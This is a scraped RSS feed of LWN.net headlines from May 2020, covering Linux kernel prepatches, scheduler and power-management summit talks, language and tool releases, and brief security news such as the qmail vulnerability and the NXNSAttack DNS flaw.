Feed lwn LWN.net


Link https://lwn.net/
Feed http://lwn.net/headlines/rss
Updated 2020-05-25 11:20
Kernel prepatch 5.7-rc7
The 5.7-rc7 kernel prepatch is out."So it looks like I was worried for nothing last rc. Of course,anything can still change, but everything _looks_ all set for aregular release scheduled for next weekend. Knock wood."
[$] Imbalance detection and fairness in the CPU scheduler
The kernel's CPU scheduler is good at distributing tasks across amultiprocessor system, but does it do so fairly? If some tasks get a lotmore CPU time than others, the result is likely to be unhappy users.Vincent Guittot ran a session at the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM) looking into this issue, with a focuson detecting load imbalances between CPUs and what to do with a workloadthat cannot be balanced.
[$] The deadline scheduler and CPU idle states
As Rafael Wysocki conceded at the beginning of a session at the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), the combination of the deadline scheduling class with CPU idle statesmight seem a little strange. Deadline scheduling is used in realtimesettings, where introducing latency by idling the CPU tends to be frownedupon. But there are reasons to think that these two technologies mightjust be made to work together.
Security updates for Friday
Security updates have been issued by CentOS (firefox, ipmitool, kernel, squid, and thunderbird), Debian (pdns-recursor), Fedora (php and ruby), Red Hat (dotnet and dotnet3.1), SUSE (dom4j, dovecot23, memcached, and tomcat), and Ubuntu (clamav, libvirt, and qemu).
[$] Saving frequency scaling in the data center
Frequency scaling — adjusting a CPU's operating frequency to save power when theworkload demands are low — is common practice across systems supported byLinux. It is, however, viewed with some suspicion in data-center settings, wherepower consumption is less of a concern and there is a strong emphasis ongetting the most performance out of the hardware. At the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), Giovanni Gherdovich worried thatfrequency scaling may be about to go extinct in data centers; he made aplea for improving its behavior for such workloads while there is stilltime.
[$] The pseudo cpuidle driver
The purpose of a cpuidle governor is to decide which idle state a CPUshould go into when it has no useful work to do; the cpuidle driverthen actually puts the CPU into that state. But, at the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), Abhishek Goel presented a newcpuidle driver that doesn't actually change the processor's power state at all.Such a driver will clearly save no power, but it can be quite useful as atool for evaluating and debugging cpuidle policies.
GNOME resolves Rothschild patent suit
The patent suit filed against the GNOMEFoundation last September hasnow been resolved. "In this walk-away settlement, GNOME receivesa release and covenant not to be sued for any patent held by RothschildPatent Imaging. Further, both Rothschild Patent Imaging and LeighRothschild are granting a release and covenant to any software that isreleased under an existing Open Source Initiative approved license (andsubsequent versions thereof), including for the entire Rothschild portfolioof patents, to the extent such software forms a material part of theinfringement allegation." There is no mention of what thefoundation had to give — if anything — for this settlement,
A review of open-source software supply chain attacks
Here's a preprint paper fromMarc Ohm, Henrik Plate, Arnold Sykosch, and Michael Meier looking atattacks on language-specific repositories. "Recent years saw anumber of supply chain attacks that leverage the increasing use of opensource during software development, which is facilitated by dependencymanagers that automatically resolve, download and install hundreds of opensource packages throughout the software life cycle. This paper presents adataset of 174 malicious software packages that were used in real-worldattacks on open source software supply chains, and which were distributedvia the popular package repositories npm, PyPI, and RubyGems. Thosepackages, dating from November 2015 to November 2019, were manuallycollected and analyzed. The paper also presents two general attack trees toprovide a structured overview about techniques to inject malicious codeinto the dependency tree of downstream users, and to execute such code atdifferent times and under different conditions."
Security updates for Thursday
Security updates have been issued by Arch Linux (keycloak, qemu, and thunderbird), Debian (dovecot), Fedora (abcm2ps and oddjob), Red Hat (java-1.7.1-ibm, java-1.8.0-ibm, and kernel-rt), SUSE (ant, bind, and freetype2), and Ubuntu (bind9 and linux, linux-aws, linux-aws-5.3, linux-gcp, linux-gcp-5.3, linux-gke-5.3,linux-hwe, linux-kvm, linux-oracle, linux-oracle-5.3, linux-raspi2 ).
[$] LWN.net Weekly Edition for May 21, 2020
The LWN.net Weekly Edition for May 21, 2020 is available.
[$] The PEPs of Python 3.9
With the releaseof Python 3.9.0b1, the first of four planned betas for the developmentcycle, Python 3.9 is now feature-complete. There is still plenty todo in terms of testing and stabilization before the October finalrelease. The release announcement lists a half-dozen Python EnhancementProposals (PEPs) that were accepted for 3.9. We have looked at someof those PEPs along the way; there are some updates on those. It seemslike a good time to fill in some of the gaps on what will be coming in Python 3.9
Stable kernel updates
Stable kernels 5.6.14, 5.4.42, 4.19.124, 4.14.181, 4.9.224, and 4.4.224 have been released with importantfixes. Users should upgrade.
A remote code execution vulnerability in qmail
Just in case anybody out there is still using qmail: a remote codeexecution vulnerability has just been disclosed. Its CVE number isCVE-2005-1513 because, as it turns out, the problem was reported 15 yearsago but the fix was refused by the maintainer."As a proof of concept, we developed a reliable, local and remote exploitagainst Debian's qmail package in its default configuration. This proofof concept requires 4GB of disk space and 8GB of memory, and allows anattacker to execute arbitrary shell commands as any user, except root(and a few system users who do not own their home directory)."
[$] Bao: a lightweight static partitioning hypervisor
Developers of safety-critical systems tend to avoid Linux kernels for anumber of fairly obvious reasons; Linux simply was not developed with thatsort of use case in mind. There are increasingly compelling reasons to useLinux in such systems, though, leading to a search for the best way to doso safely. At the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), José Martins described Bao, a minimalhypervisor aimed at safety-critical deployments.
Security updates for Wednesday
Security updates have been issued by Debian (bind9 and clamav), Fedora (kernel, moodle, and transmission), Oracle (kernel), Red Hat (ipmitool, kernel, ksh, and ruby), Slackware (bind and libexif), SUSE (dpdk, openconnect, python, and rpmlint), and Ubuntu (linux, linux-aws, linux-gcp, linux-kvm, linux-oracle, linux-riscv and linux-gke-5.0, linux-oem-osp1).
[$] The state of the AWK
AWK is a text-processing language with a history spanning more than 40years. It has a POSIXstandard, several conforming implementations, and is still surprisingly relevant in 2020 — both for simple text processing tasks and for wrangling "big data". Therecentreleaseof GNU Awk 5.1 seems like a good reason to survey the AWK landscape, seewhat GNU Awk has been up to, and look at where AWK is being used these days.
NXNSAttack: upgrade resolvers to stop new kind of random subdomain attack
CZ.NIC staff member Petr Špaček has a blog post describing a newly disclosed DNS resolver vulnerability called NXNSAttack. It allows attackers to abuse the delegation mechanism to create a denial-of-service condition via packet amplification. "This is so-called glueless delegation, i.e. a delegation which contains only names of authoritative DNS servers (a.iana-servers.net. and b.iana-servers.net.), but does not contain their IP addresses. Obviously DNS resolver cannot send a query to “name”, so the resolver first needs to obtain IPv4 or IPv6 address of authoritative server 'a.iana-servers.net.' or 'b.iana-servers.net.' and only then it can continue resolving the original query 'example.com. A'.This glueless delegation is the basic principle of the NXNSAttack: Attacker simply sends back delegation with fake (random) server names pointing to victim DNS domain, thus forcing the resolver to generate queries towards victim DNS servers (in a futile attempt to resolve fake authoritative server names)." At this time, Ubuntu has updated its BIND package to mitigate the problem; other distributions will no doubt follow soon. More details can also be found in the paper [PDF].
[$] Evaluating vendor changes to the scheduler
The kernel's CPU scheduler does its best to make the right decisions forjust about any workload; over the years, it has been extended to betterhandle mobile-device scheduling as well. But handset vendors still end upapplying their own patches to the scheduler for the kernels they ship.Shipping out-of-tree code in this way leads to a certain amount ofcriticism from the kernel community but, asVincent Donnefort pointed out in his session at the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), those patches are applied for areason. He looked at a set of vendor scheduler patches to see why they arebeing used.
Security updates for Tuesday
Security updates have been issued by Debian (dpdk and exim4), Fedora (openconnect, perl-Mojolicious, and php), Red Hat (kernel and kpatch-patch), Slackware (sane), and Ubuntu (bind9, dpdk, exim4, linux, linux-aws, linux-aws-hwe, linux-gcp, linux-gke-4.15, linux-hwe, linux-oem, linux-oracle, linux-snapdragon, and linux, linux-aws, linux-lts-xenial, linux-raspi2, linux-snapdragon).
[$] Scheduler benchmarking with MMTests
The MMTests benchmarkingsystem is normally associated with its initial use case: testingmemory-management changes. Increasingly, though, MMTests is not limited tomemory management testing; at the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), Dario Faggioli talked about how heis using it to evaluate changes to the CPU scheduler, along with adiscussion of the changes he had to make to get useful results for systemshosting virtualized guests.
[$] The many faces of "latency nice"
A task's "nice" value describes its priority within the completely fairscheduler; its semantics have roots in ancient Unix tradition. LastAugust, a "latencynice" parameter was proposed to provide similar control over a task'sresponse-time requirements. At the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), Parth Shah, Chris Hyser, and DietmarEggemann ran a discussion about the latency nice proposal; it seems thateverybody agrees that it would be a useful feature to have, but there is awide variety of opinions about what it should actually do.
Security updates for Monday
Security updates have been issued by Debian (apache-log4j1.2, exim4, libexif, and openconnect), Fedora (chromium, condor, java-1.8.0-openjdk, java-1.8.0-openjdk-aarch32, mingw-ilmbase, mingw-OpenEXR, sleuthkit, and squid), Mageia (jbig2dec, libreswan, netkit-telnet, ntp, and suricata), openSUSE (mailman and nextcloud), SUSE (autoyast2, file, git, gstreamer-plugins-base, libbsd, libvirt, libvpx, libxml2, mailman, and openexr), and Ubuntu (dovecot and json-c).
Kernel prepatch 5.7-rc6
Linus has released the 5.7-rc6 kernelprepatch, which contains a bit more churn than he would like."That said, there's nothing particularly scary in here, and it's notlike this rc6 is outrageously big or out of control. I was just hoping forless."
[$] Utilization inversion and proxy execution
Over the years, the kernel's CPU scheduler has become increasingly aware ofhow much load every task is putting on the system; this information is usedto make smarter task placement decisions. Sometimes, though, this logiccan go wrong, leading to a situation that Valentin Schneider describes as"utilization inversion". At the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), he described the problem and someapproaches that are being considered to address it.
[$] Testing scheduler thermal properties for avionics
Linux is not heavily used in safety-critical systems — yet. There is anincreasing level of interest in such deployments, though, and that isdriving a number of initiatives to determine how Linux can be made suitablefor safety-critical environments. At the 2020 Power Management and Schedulingin the Linux Kernel summit (OSPM), Michal Sojka shone a light on onecorner of this work: testing the thermal characteristics of Linux systemswith an eye toward deployment in avionics systems.
Security updates for Friday
Security updates have been issued by Debian (apt, inetutils, and log4net), Fedora (kernel, mailman, and viewvc), Gentoo (chromium, freerdp, libmicrodns, live, openslp, python, vlc, and xen), Oracle (.NET Core, container-tools:1.0, and kernel), Red Hat (kernel-rt), Scientific Linux (kernel), SUSE (kernel, libvirt, python-PyYAML, and syslog-ng), and Ubuntu (json-c).
Five years of Rust
It seems that the Rust programming language hasonly been around for five years. "With all that's going on inthe world you'd be forgiven for forgetting that as of today, it has beenfive years since we released 1.0 in 2015! Rust has changed a lot these pastfive years, so we wanted reflect back on all of our contributors' worksince the stabilization of the language."
Going above and beyond with Inkscape 1.0 (Libre Graphics World)
Libre Graphics World is running anextensive interview with several Inkscape developers."I'd say we're at the point of supporting SVG as much as possible,but we've mostly given up trying to add editing features to the SVGspecification. As the W3C is dominated by web browsers who don't need multipage or connectors.I dare not say much more about W3C-specific things. I know that I'mpersonally disappointed that Inkscape's considerable importance in the SVGcreation space does not lend itself to getting the feature we intend tobuild into Inkscape into the actual SVG specification. This does lead tothe problem that going forwards we're likely to have browserincompatibilities."
[$] The weighted TEO cpuidle governor
Life gets complicated for the kernel when there is nothing for the systemto do. The obvious response is to put the CPU into an idle state tosave power, but which one? CPUs offer a wide range of sleep states withdifferent power-usage and latency characteristics. Picking too shallow astate will waste energy, while going too deep hurts latency and can impactthe performance of the system as a whole. The timer-events-oriented (TEO) cpuidle governoris a relatively new attempt to improve the kernel's choice of sleep states;at the 2020 Power Management and Scheduling in the Linux Kernel Summit,Pratik Sampat presented avariant of the TEO governor that tries to improve its choices further.
Three new stable kernels
The 5.6.13, 5.4.41, and 4.19.123 stable kernels have been released.They contain important fixes throughout the kernel tree; users should upgrade.
Security updates for Thursday
Security updates have been issued by Debian (apt and libreswan), Fedora (glpi, grafana, java-latest-openjdk, mailman, and oddjob), Oracle (container-tools:2.0, container-tools:ol8, kernel, libreswan, squid:4, and thunderbird), SUSE (apache2, grafana, and python-paramiko), and Ubuntu (apt and libexif).
[$] LWN.net Weekly Edition for May 14, 2020
The LWN.net Weekly Edition for May 14, 2020 is available.
[$] Subinterpreters for Python
A project that has been floating around in the Python world for a number ofyears is now working its way toward inclusion into the language—or not."Subinterpreters", which are separate Python interpreters that cancurrently be created via the C API for extensions, are seen by some as away to get a more Go-like concurrency model for Python. The first steptoward that goal is to expose that API in the standard library. But thereare questions about whether subinterpreters are actually a desirablefeature for Python at all, as well as whether the hoped-for concurrencyimprovements will materialize.
[$] Completing and merging core scheduling
Core scheduling is a proposed modificationto the kernel's CPU scheduler that allows system administrators to controlwhich processes can be running simultaneously on the same processor core.It was originally proposed as a security mechanism, but other use cases have shown up over time aswell. At the 2020 PowerManagement and Scheduling in the Linux Kernel summit (OSPM), a group ofsome 50 developers gathered online to discuss the current state of the core-scheduling patches and what is needed to get them intothe mainline kernel.
Security updates for Wednesday
Security updates have been issued by Fedora (java-1.8.0-openjdk and seamonkey), Gentoo (firefox, lrzip, qemu, squid, and thunderbird), Oracle (thunderbird), Red Hat (buildah, kernel, kernel-alt, kernel-rt, kpatch-patch, podman, python-pip, python-virtualenv, and qemu-kvm), Scientific Linux (kernel), Slackware (mariadb), SUSE (openconnect), and Ubuntu (file, firefox, iproute2, pulseaudio, and squid, squid3).
[$] What's coming in Go 1.15
Go 1.15, the 16th major version of the Goprogramming language, is due out on August 1. It will be a release with fewer changes than usual, but many ofthe major changes are behind-the-scenes or in the tooling: for example,there is anew linker, which will speed up build times and reduce the size ofbinaries.In addition, there are performance improvements to the language's runtime,changes to the architectures supported, and some updates to the standard library. Overall, it should be a solidupgrade for the language.
Security updates for Tuesday
Security updates have been issued by Arch Linux (a2ps and qutebrowser), openSUSE (cacti, cacti-spine, ghostscript, and python-markdown2), Oracle (kernel), Red Hat (chromium-browser, libreswan, and qemu-kvm-ma), Scientific Linux (thunderbird), and SUSE (kernel and libvirt).
Hussain: Lord of the io_uring
Shuveb Hussain has posted an extensiveintroduction to io_uring, complete with examples and a reference guide."Because of the shared ring buffers between the kernel and userspace, io_uring can be a zero-copy system. Copying bytes around becomesnecessary when there are system calls that transfer data between kernel anduser space are involved. But since the bulk of the communication inio_uring is via buffers shared between the kernel and user space, this hugeperformance overhead is completely avoided."
[$] O_MAYEXEC — explicitly opening files for execution
Normally, when a kernel developer shows up with a proposed option thatdoesn't do anything, a skeptical response can be expected. But there areexceptions. Mickaël Salaün is proposingthe addition of a new flag (O_MAYEXEC) for the openat2() system call that, by default, will change nothing. But it doesopen a path toward tighter security in some situations.
A set of stable kernels
Stable kernels 5.6.12, 5.4.40, 4.19.122, 4.14.180, 4.9.223, and 4.4.223 have been released. They all containimportant fixes and users should upgrade.
Security updates for Monday
Security updates have been issued by Arch Linux (chromium and firefox), Debian (libntlm, squid, thunderbird, and wordpress), Fedora (chromium, community-mysql, crawl, roundcubemail, and xen), Mageia (chromium-browser-stable), openSUSE (chromium, firefox, LibVNCServer, openldap2, opera, ovmf, php7, python-PyYAML, rpmlint, rubygem-actionview-5_1, slirp4netns, sqliteodbc, squid, thunderbird, and webkit2gtk3), Oracle (firefox, git, gnutls, kernel, libvirt, squid, and targetcli), Red Hat (thunderbird), SUSE (firefox, squid, and thunderbird), and Ubuntu (mailman).
Kernel prepatch 5.7-rc5
The 5.7-rc5 kernel prepatch is out fortesting. "We'll see what the next few weeks bring, but at least for now it allfeels normal, and like the 5.7 release is tracking well.So please keep testing, and if you haven't dared a 5.7 pre-releasekernel yet, we're well into the 'things look calm and safe to test'time."
[$] Blocking userfaultfd() kernel-fault handling
The userfaultfd()system call is a bit of a strange beast; it allows user space to takeresponsibility for the handling of page faults, which is normally aquintessential kernel task. It is thus perhaps not surprising that it hasturned out to have some utility for those who would attack the kernel'ssecurity as well. A recent patchset from Daniel Colascione is small, but it makes a significant changethat can help block at least one sort of attack usinguserfaultfd().
Security updates for Friday
Security updates have been issued by Debian (firefox-esr, salt, and webkit2gtk), Fedora (firefox, mingw-gnutls, nss, and teeworlds), Mageia (firefox, libvncserver, matio, qt4, roundcubemail, samba, thunderbird, and vlc), Oracle (firefox and squid), SUSE (firefox, ghostscript, openldap2, rmt-server, syslog-ng, and webkit2gtk3), and Ubuntu (firefox).
[$] Private loop devices with loopfs
A loop device is a kernel abstraction that allows a file to be presented asif it were a physical block device. The typical use for a loop device is to mount afilesystem image stored in a file. Loop devices are global and shared betweenusers, which causes a number of problems for container workloads where theinstances are expected to be isolated from each other. Christian Braunerhas been working on this problem; he has posted a patchset solving it by adding a small virtual filesystem called loopfs.
GCC 10.1 Released
The GCC project has announced therelease of GCC 10.1. "A year has lapsed away since the release of last majorGCC release, more than 33 years passed since the firstpublic GCC release and the GCC developers survivedrepository conversion from SVN to GIT earlier this year.Today, we are glad to announce another major GCC release, 10.1.This release makes great progress in the C++20 language support,both on the compiler and library sides, some C2X enhancements,various optimization enhancements and bug fixes, several newhardware enablement changes and enhancements to the compiler back-endsand many other changes. There is even a new experimentalstatic analysis pass." More information can be found in the release notes.
Security updates for Thursday
Security updates have been issued by Debian (firefox-esr, keystone, mailman, and tomcat9), Fedora (ceph, firefox, java-1.8.0-openjdk, libldb, nss, samba, seamonkey, and suricata), Oracle (kernel), Scientific Linux (firefox and squid), SUSE (libvirt, php7, slirp4netns, and webkit2gtk3), and Ubuntu (linux-firmware and openldap).
[$] LWN.net Weekly Edition for May 7, 2020
The LWN.net Weekly Edition for May 7, 2020 is available.
[$] Making Emacs popular again
The Emacs editor predatesLinux, and was once far more popular, but it has fallen into relative obscurity over the years.In a mega-thread on the emacs-devel mailing list, participants discussedvarious ideas for making Emacs more "attractive", in both aestheticand in "appealing to more users" senses of that term. Any improvementsto Emacs in that regard have numerous hurdles to overcome, however. Thereare technical questions and, naturally, licensing considerations, butthere is also the philosophical question of what it is, exactly, that stopsthe venerable text editor from being more popular.
Stable kernel updates
Stable kernels 5.6.11, 5.4.39, 4.19.121, 4.14.179, 4.9.222, and 4.4.222 have been released. They all containimportant fixes and users should upgrade.